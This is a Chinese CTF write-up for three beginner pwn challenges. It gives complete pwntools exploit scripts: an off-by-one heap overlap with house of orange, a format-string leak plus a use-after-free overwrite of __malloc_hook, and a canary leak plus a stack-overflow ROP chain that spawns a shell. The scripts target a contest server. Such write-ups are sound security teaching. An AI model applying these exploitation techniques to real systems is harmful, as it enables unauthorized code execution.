这个比赛我没怎么玩，主要是比赛当天有事，据说是新手向的题目，是河北师范大学举办的比赛，我只做了里面几道题。

0x01 hard_pwn

就存在一个off-by-one，可以直接解造成堆块重叠，进而使用house of orange来getshell

from pwn import *

context.log_level="debug"
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def free(index):
	p.sendlineafter(': ',"3")
	p.sendlineafter(': ',str(index))

def create(size):
	p.sendlineafter(': ',"1")
	p.sendlineafter(': ',str(size))

def edit(index,size,content):
	p.sendlineafter(': ',"2")
	p.sendlineafter(': ',str(index))
	p.sendlineafter(": ",str(size))
	p.sendafter(':',content)

def show(index):
	p.sendlineafter(': ',"4")
	p.sendlineafter(': ',str(index))

#p=process("./hard_pwn")
p=remote("183.129.189.60",10026)
create(0x90)#0
create(0xf8)#1
create(0x90)#2
create(0x90)#3
free(0)
edit(1,0x100,0xf0*'a'+p64(0x1a0)+p64(0xa0))
free(2)
create(0x90)#0
show(1)
p.recvuntil("You play is ")
libc_base=u64(p.recv(6).ljust(8,'\x00'))-(0x00007ffff7dd1b78-0x7ffff7a0d000)
_IO_list_all=libc_base+libc.symbols['_IO_list_all']
success("libc_base=====>0x%x"%libc_base)
pause()
fake_file=p64(0)+p64(0x61)
edit(0,0xa0,'a'*0x90+fake_file)
fake_file=p64(0)+p64(_IO_list_all-0x10)
fake_file+=p64(1)+p64(2)
fake_file+=p64(0)+p64(libc_base+0x18cd57)
fake_file=fake_file.ljust(0xc8,"\x00")
fake_file+=p64(libc_base+0x3c37a0-8)
fake_file+=p64(0)
fake_file+=p64(libc_base+libc.symbols['system'])
edit(1,0x100,fake_file)
#gdb.attach(p)
create(0xf8)#1
p.interactive()

0x02 pwn_disco

说实话本题画风还是挺搞笑的，运行程序的时候我笑了好久。存在漏洞有两个，让这一题变得简单起来，一个是格式化字符串，直接可以泄露出libc基址出来，另一个是UAF,当free堆块之后,存在悬挂指针，直接攻击__malloc_hook然后修改为one_gadget来getshell

from pwn import *
p=remote("183.129.189.60",10002)
#p=process('./pwn_disco')
context.log_level="debug"
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

def create(index,content):
	p.sendlineafter('Your Choice:',"2")
	p.sendlineafter('Your Choice:',"1")
	p.sendlineafter('index:',str(index))
	p.sendafter('color:',content)

def edit(index,content):
	p.sendlineafter('Your Choice:',"2")
	p.sendlineafter('Your Choice:',"0")
	p.sendlineafter(":",str(index))
	p.sendafter('color:',content)
def free(index):
	p.sendlineafter('Your Choice:',"3")
	p.sendlineafter('index:',str(index))

p.sendlineafter('Your Choice:',"1")
p.sendlineafter('draw:',"%15$p")
p.recvuntil('0x')
libc_base=int(p.recv(12),16)-(0x7f7e0aafb830-0x7f7e0aadb000)
success("libc_base===>0x%x"%libc_base)
create(0,'11111')
free(0)
edit(0,p64(libc_base+libc.symbols['__malloc_hook']-0x23))
create(0,p64(libc_base+libc.symbols['__malloc_hook']-0x23))
onegad=[0x45216,0x4526a,0xf02a4,0xf1147]
create(1,'\x00'*(0x13-0x8)+p64(libc_base+onegad[3])+p64(libc_base+onegad[3]))
free(0)
p.sendlineafter('Your Choice:',"2")
p.sendlineafter('Your Choice:',"1")
p.sendlineafter('index:','0')

#gdb.attach(p)
p.interactive()

0x03 stackpwn2

这一题真新手向题目，也是存在两个洞，一个是格式化字符串来泄露canary,然后又存在栈溢出

from pwn import *
from LibcSearcher import *
p=process('./stackpwn2')
#p=remote('183.129.189.60',10000)
p.recvuntil('checking the output system...\n')
pause()
p.sendline('%9$p')
p.recvuntil('0x')
canary=int(p.recv(16),16)
payload='a'*0x18+p64(canary)+'aaaaaaaa'+p64(0x00000000004009c3)+p64(0x000000000601018)+p64(0x0400650)+p64(0x0000000004008A2)
p.sendlineafter("What you want to do?\n",payload)
puts_addr=u64(p.recv(6).ljust(8,'\x00'))
obj=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-obj.dump('puts')
payload='a'*0x18+p64(canary)+'aaaaaaaa'+p64(0x00000000004009c3)+p64(libc_base+obj.dump("str_bin_sh"))+p64(libc_base+obj.dump('system'))+p64(0x0000000004008A2)
p.sendline(payload)
p.interactive()